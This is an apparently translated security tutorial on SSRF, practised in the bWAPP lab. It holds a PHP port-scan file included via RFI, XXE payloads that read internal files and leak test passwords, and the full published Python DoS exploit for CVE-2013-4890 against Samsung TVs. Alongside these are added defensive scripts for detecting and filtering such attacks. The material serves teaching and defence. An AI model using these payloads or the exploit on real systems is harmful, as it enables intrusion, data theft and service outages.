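The same pattern the Snort rule keys on can be applied retrospectively to Apache access logs. The following Python script is an added example, not part of the original post or of the Apache project: it assumes the combined log format, builds three constructed sample log lines, mirrors the rule's GET / urilen:>200 / "?unix:" ... "|http" conditions, and percent-decodes the URI first so that %7c / %3a spellings are caught as well.

```python
import re
from urllib.parse import unquote

# Mirrors the Snort rule: GET method, URI longer than 200 bytes, "?unix:"
# followed later by "|http". (Added example; thresholds copied from the rule.)
MIN_URI_LEN = 200
UNIX_PIPE_RE = re.compile(r"\?unix:[^|]*\|https?://", re.IGNORECASE)

# Apache "combined" access-log layout (assumed format for the sample below)
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)


def is_cve_2021_40438_probe(method, uri):
    """True when the request matches the ?unix:...|http pattern and the length check."""
    decoded = unquote(uri)  # "|" and ":" may arrive percent-encoded (%7c, %3a)
    return (
        method.upper() == "GET"
        and len(decoded) > MIN_URI_LEN
        and UNIX_PIPE_RE.search(decoded) is not None
    )


def scan_access_log(lines):
    """Return one hit per suspicious line: (source IP, timestamp, status, pipe target)."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        if is_cve_2021_40438_probe(m["method"], m["uri"]):
            decoded = unquote(m["uri"])
            target = decoded.split("|", 1)[1]  # the URL the proxy was told to fetch
            hits.append((m["src"], m["ts"], m["status"], target))
    return hits


# Constructed sample log: one benign request, one percent-encoded probe, one raw probe.
PROBE_PATH = "/?unix:" + "A" * 300 + "|http://internal.example/"
SAMPLE_LOG = [
    '198.51.100.5 - - [10/Dec/2021:13:55:30 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Dec/2021:13:55:36 +0000] "GET ' + PROBE_PATH.replace("|", "%7c")
    + ' HTTP/1.1" 502 341 "-" "curl/7.68.0"',
    '203.0.113.7 - - [10/Dec/2021:13:55:41 +0000] "GET ' + PROBE_PATH
    + ' HTTP/1.1" 200 1187 "-" "curl/7.68.0"',
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print("CVE-2021-40438 probe from %s at %s (status %s) -> %s" % hit)
```

Run it against a real access.log by passing the file's lines to scan_access_log; the pipe target tells you which internal address the attacker was steering mod_proxy toward, which is the first thing to check during triage.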

4. References

https://nvd.nist.gov/vuln/detail/CVE-2021-40438

https://github.com/sixpacksecurity/CVE-2021-40438

https://www.wangan.com/p/7fygfy122c313bee

https://cydrill.com/owasp/apache-ssrf-an-all-you-can-eat-reverse-proxy/

https://github.com/apache/httpd/commit/520dcd80a45ce237e9a46ee28697e1b8af3fcd7e

https://www.leavesongs.com/PENETRATION/apache-mod-proxy-ssrf-cve-2021-40438.html

https://firzen.de/building-a-poc-for-cve-2021-40438

https://koromoon.blogspot.com/2021/12/cve-2021-40438-apache-http-server.html

1. SSRF (Server-Side Request Forgery)

- A vulnerability in which the server is made to send forged requests, giving access to internal resources that users normally cannot reach and enabling malicious actions

- In other words, an attack in which the attacker uses a vulnerable server to send requests of their choosing to internal servers and steal information

[Figure 1] How SSRF works

- XSS (Cross-site Scripting): a malicious script injected by the attacker runs on the user's PC
- CSRF (Cross Site Request Forgery): a malicious script injected by the attacker runs on the server with the user's privileges
- SSRF (Server-Side Request Forgery): a request crafted by the attacker runs on the server

2. bWAPP practice

- The SSRF section of bWAPP allows practising three scenarios

[Figure 2] bWAPP SSRF

- Three files are used for the attacks, corresponding in order to [Figure 2]

[Figure 3] Scenario files

2.1 Port scan via RFI

- Uses the ssrf-1.txt file

- fsockopen is a PHP function that checks whether a socket can be opened; this file reports which ports are open on the IP received in the ip parameter

<?php
// bWAPP ssrf-1.txt: included remotely through rlfi.php, so it runs on the bWAPP server itself
echo "<script>alert(\"U 4r3 0wn3d by MME!!!\");</script>";

if(isset($_REQUEST["ip"]))
{
    // list of port numbers to scan
    $ports = array(21, 22, 23, 25, 53, 80, 110, 1433, 3306);

    $results = array();

    foreach($ports as $port)
    {
        // 1-second connect timeout; "@" suppresses the warning PHP emits for a closed port
        if($pf = @fsockopen($_REQUEST["ip"], $port, $err, $err_string, 1))
        {
            $results[$port] = true;
            fclose($pf);
        }
        else
        {
            $results[$port] = false;
        }
    }

    foreach($results as $port=>$val)
    {
        // service name registered for the port, e.g. 80 -> "http"
        $prot = getservbyport($port,"tcp");
        echo "Port $port ($prot): ";

        if($val)
        {
            echo "<span style=\"color:green\">OK</span><br/>";
        }
        else
        {
            echo "<span style=\"color:red\">Inaccessible</span><br/>";
        }
    }
}
?>

- Go to Remote & Local File Inclusion (RFI/LFI) and click Go; the URL changes as follows

[Figure 4] RFI

http://192.168.56.109/bWAPP/rlfi.php?language=lang_en.php&action=go

- ssrf-1.txt was seen to require an ip parameter, so the URL is changed accordingly

① Pass the path of ssrf-1.txt in the language parameter > the port scan runs

② Pass 127.0.0.1 in the ip parameter > loopback (itself = the bWAPP server)

http://192.168.56.109/bWAPP/rlfi.php?language=http://192.168.56.109/evil/ssrf-1.txt&action=go&ip=127.0.0.1

- Sending a request to the above URL returns the port scan results for the bWAPP server

[Figure 5] Port scan results

2.2 Accessing internal network resources via XXE

- Contents of ssrf-2.txt

# Accesses a file on the internal network (1)

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
 <!ENTITY bWAPP SYSTEM "http://localhost/bWAPP/robots.txt">
]>
<reset><login>&bWAPP;</login><secret>blah</secret></reset>


# Accesses a file on the internal network (2)
# Web pages returns some characters that break the XML schema > use the PHP base64 encoder filter to return an XML schema friendly version of the page!

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
 <!ENTITY bWAPP SYSTEM "php://filter/read=convert.base64-encode/resource=http://localhost/bWAPP/passwords/heroes.xml">
]>
<reset><login>&bWAPP;</login><secret>blah</secret></reset>
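Both payloads work only because the XML parser resolves the SYSTEM entity, so the server-side fix is to refuse DOCTYPE and entity declarations before the document is parsed. The following Python script is an added example, not bWAPP's code: it lists the external entities a document declares without ever fetching them (expat is told to abort at the reference), and parses the <reset> message only when no DTD is present. The two payloads are quoted from ssrf-2.txt above; the benign message and the function names are constructed for the example.

```python
import re
import xml.etree.ElementTree as ET
import xml.parsers.expat

DOCTYPE_RE = re.compile(r"<!DOCTYPE", re.IGNORECASE)


def external_entities(xml_text):
    """List (entity name, SYSTEM id) for every external entity declared in the DTD.

    Parsing is aborted as soon as an external entity is referenced in content, so
    nothing is fetched; the declarations seen before that point are returned.
    """
    found = []

    def entity_decl(name, is_param, value, base, system_id, public_id, notation):
        # value is None for external entities; system_id carries the target URL
        if system_id is not None or public_id is not None:
            found.append((name, system_id))

    parser = xml.parsers.expat.ParserCreate()
    parser.EntityDeclHandler = entity_decl
    # Returning 0 makes expat raise instead of resolving the external reference.
    parser.ExternalEntityRefHandler = lambda context, base, system_id, public_id: 0
    try:
        parser.Parse(xml_text, True)
    except xml.parsers.expat.ExpatError:
        pass  # aborted at the &bWAPP; reference, which is exactly what we want
    return found


def has_dtd(xml_text):
    """The reset message never needs a DTD, so any DOCTYPE is rejected up front."""
    return DOCTYPE_RE.search(xml_text) is not None


def parse_reset(xml_text):
    """Parse a <reset> message, refusing DOCTYPE/entity declarations before the parser runs."""
    if has_dtd(xml_text):
        raise ValueError("DOCTYPE/entity declarations are not allowed in this message")
    root = ET.fromstring(xml_text)
    return {"login": root.findtext("login"), "secret": root.findtext("secret")}


# Payloads quoted from ssrf-2.txt, plus a constructed benign message.
PAYLOAD_ROBOTS = """<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
 <!ENTITY bWAPP SYSTEM "http://localhost/bWAPP/robots.txt">
]>
<reset><login>&bWAPP;</login><secret>blah</secret></reset>"""

PAYLOAD_FILTER = """<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
 <!ENTITY bWAPP SYSTEM "php://filter/read=convert.base64-encode/resource=http://localhost/bWAPP/passwords/heroes.xml">
]>
<reset><login>&bWAPP;</login><secret>blah</secret></reset>"""

BENIGN = """<?xml version="1.0" encoding="utf-8"?>
<reset><login>neo</login><secret>blah</secret></reset>"""

if __name__ == "__main__":
    for label, doc in (("robots", PAYLOAD_ROBOTS), ("filter", PAYLOAD_FILTER), ("benign", BENIGN)):
        print(label, "declares external entities:", external_entities(doc))
    print("benign parses to:", parse_reset(BENIGN))
```

external_entities is the logging side (what was the document trying to reach?), parse_reset the enforcement side; in production the DTD check should run before any library parser touches the input, because some parsers resolve entities during parsing and not only when the value is read.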

 

2.2.1 Accesses a file on the internal network (1)

- Go to SQL Injection - Stored (XML), set up the proxy and start Burp Suite

[Figure 6] SQL Injection XML

- In [Figure 6], Any bugs? > Burp Suite Send to Repeater > write the payload > Send

- The response to this request exposes the contents of the robots.txt file on the bWAPP server

[Figure 7] robots.txt exposed

2.2.2 Accesses a file on the internal network (2)

- In [Figure 6], Any bugs? > Burp Suite Send to Repeater > write the payload > Send

[Figure 8] 200 OK

- Decoding the response seen in [Figure 8] as Base64 in Burp Suite's Decoder reveals the contents of /bWAPP/passwords/heroes.xml

[Figure 9] Base64 decoding

<?xml version="1.0" encoding="UTF-8"?>
<heroes>
	<hero>
		<id>1</id>
		<login>neo</login>
		<password>trinity</password>
		<secret>Oh why didn't I took that BLACK pill?</secret>
		<movie>The Matrix</movie>
		<genre>action sci-fi</genre>
	</hero>
	<hero>
		<id>2</id>
		<login>alice</login>
		<password>loveZombies</password>
		<secret>There's a cure!</secret>
		<movie>Resident Evil</movie>
		<genre>action horror sci-fi</genre>
	</hero>
	<hero>
		<id>3</id>
		<login>thor</login>
		<password>Asgard</password>
		<secret>Oh, no... this is Earth... isn't it?</secret>
		<movie>Thor</movie>
		<genre>action sci-fi</genre>
	</hero>
	<hero>
		<id>4</id>
		<login>wolverine</login>
		<password>Log@N</password>
		<secret>What's a Magneto?</secret>
		<movie>X-Men</movie>
		<genre>action sci-fi</genre>
	</hero>
	<hero>
		<id>5</id>
		<login>johnny</login>
		<password>m3ph1st0ph3l3s</password>
		<secret>I'm the Ghost Rider!</secret>
		<movie>Ghost Rider</movie>
		<genre>action sci-fi</genre>
	</hero>
	<hero>
		<id>6</id>
		<login>selene</login>
		<password>m00n</password>
		<secret>It wasn't the Lycans. It was you.</secret>
		<movie>Underworld</movie>
		<genre>action horror sci-fi</genre>
	</hero>
</heroes>

2.3 Attacking a Samsung Smart TV via XXE (CVE-2013-4890)

- CVE-2013-4890: sending a GET request consisting of 300 "A"s to TCP/5600 of the DMCRUIS/0.1 web server on a Samsung PS50C7700 TV stops the service

[Figure 10] https://nvd.nist.gov/vuln/detail/CVE-2013-4890

- Contents of ssrf-3.txt

# Crashes my Samsung SmartTV (CVE-2013-4890) ;)

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
 <!ENTITY bWAPP SYSTEM "http://[IP]:5600/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA">
]>
<reset><login>&bWAPP;</login><secret>blah</secret></reset>

 

- The published PoC confirms this: it sends a request of 300 "A"s to TCP/5600 on the vulnerable Samsung Smart TV

#!/usr/bin/python

# Exploit Title: Samsung TV Denial of Service (DoS) Attack
# Date: 07/21/2013
# Exploit Author: Malik Mesellem - @MME_IT - http://www.itsecgames.com
# CVE Number: CVE-2013-4890
# Vendor Homepage: http://www.samsung.com
# Description: Resets some Samsung TVs
#   The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by sending a long HTTP GET request
#   Tested successfully on my Samsung PS50C7700 plasma TV :)

import httplib
import sys
import os

print "  ***************************************************************************************"
print "   Author: Malik Mesellem - @MME_IT - http://www.itsecgames.com\n"
print "   Exploit: Denial of Service (DoS) attack\n"
print "   Description: Resets some Samsung TVs\n"
print "     The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by sending a long request."
print "     Tested successfully on my Samsung PS50C7700 plasma TV :)\n"
print "  ***************************************************************************************\n"

# Sends the payload
print "  Sending the malicious payload...\n"
conn = httplib.HTTPConnection(sys.argv[1],5600)
conn.request("GET", "A"*300)
conn.close()

# Checks the response
print "  Checking the status... (CTRL+Z to stop)\n"
response = 0
while response == 0:
  response = os.system("ping -c 1 " + sys.argv[1] + "> /dev/null 2>&1")
  if response != 0:
    print "  Target down!\n"

 

- Attack demonstration (YouTube)

https://www.youtube.com/watch?v=U-R2epNnUiM

3. Countermeasures

① Input filtering

- Filter values that must not be reachable from inside the server, or blacklist 127.0.0.1, localhost, private IP ranges and the like
- Whitelist the input so that only allowed domains and URLs can be accessed

- Filter the values that could be used to bypass the filter as well
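A concrete version of ① for a server-side fetcher, as an added Python example that is not from the post or from bWAPP: the allow-list is checked before any blacklist, IP literals in every spelling that slips past string matching (127.1, 2130706433, 0x7f000001, [::1], ::ffff:127.0.0.1) are rejected outright, and a second check on the resolved addresses is kept for fetch time. The names in ALLOWED_HOSTS and the function names are placeholders chosen for the example.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Constructed allow-list: the only hosts this server-side fetcher may talk to.
ALLOWED_HOSTS = {"buy.example.com", "api.example.com"}
ALLOWED_SCHEMES = {"http", "https"}


def literal_ip(host):
    """Return the address if `host` is an IP literal in any spelling, else None.

    Besides dotted quads and IPv6, inet_aton accepts the short and numeric forms
    used to bypass string blacklists: 127.1, 2130706433, 0x7f000001.
    """
    try:
        return ipaddress.ip_address(host)
    except ValueError:
        pass
    try:
        return ipaddress.IPv4Address(socket.inet_aton(host))
    except OSError:
        return None


def is_forbidden_ip(ip):
    """True for loopback, private, link-local, shared, multicast, reserved and unspecified ranges."""
    ip = ipaddress.ip_address(ip) if isinstance(ip, str) else ip
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped  # ::ffff:127.0.0.1 is still loopback
    return not ip.is_global


def check_url(url):
    """Return (allowed, reason). Allow-list first: anything that is not a listed hostname fails."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, "scheme %r not allowed" % parts.scheme
    host = parts.hostname  # lowercased; userinfo, brackets and port already stripped
    if not host:
        return False, "no host"
    if literal_ip(host) is not None:
        return False, "IP literals are not allowed"
    if host not in ALLOWED_HOSTS:
        return False, "host %r not on allow-list" % host
    return True, "ok"


def resolved_is_forbidden(host):
    """Second check at fetch time: every address the name resolves to must be global.

    Guards against an allow-listed name pointing at an internal address (DNS rebinding).
    Needs network access, so it is not exercised by the offline test.
    """
    infos = socket.getaddrinfo(host, None)
    return any(is_forbidden_ip(info[4][0]) for info in infos)


if __name__ == "__main__":
    for candidate in ("https://buy.example.com/item/1", "http://127.1/", "http://2130706433/",
                      "http://[::1]/", "http://user@buy.example.com@127.0.0.1/", "file:///etc/passwd"):
        print(candidate, "->", check_url(candidate))
```

The order matters: a blacklist alone has to enumerate every spelling of every internal range, while an allow-list of hostnames only has to be right about the handful of destinations the feature needs, and the resolved-address check closes the gap where a listed name later resolves somewhere it should not.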

 

② Apply additional authentication where sensitive information is involved

③ Isolate servers and similar systems that hold sensitive information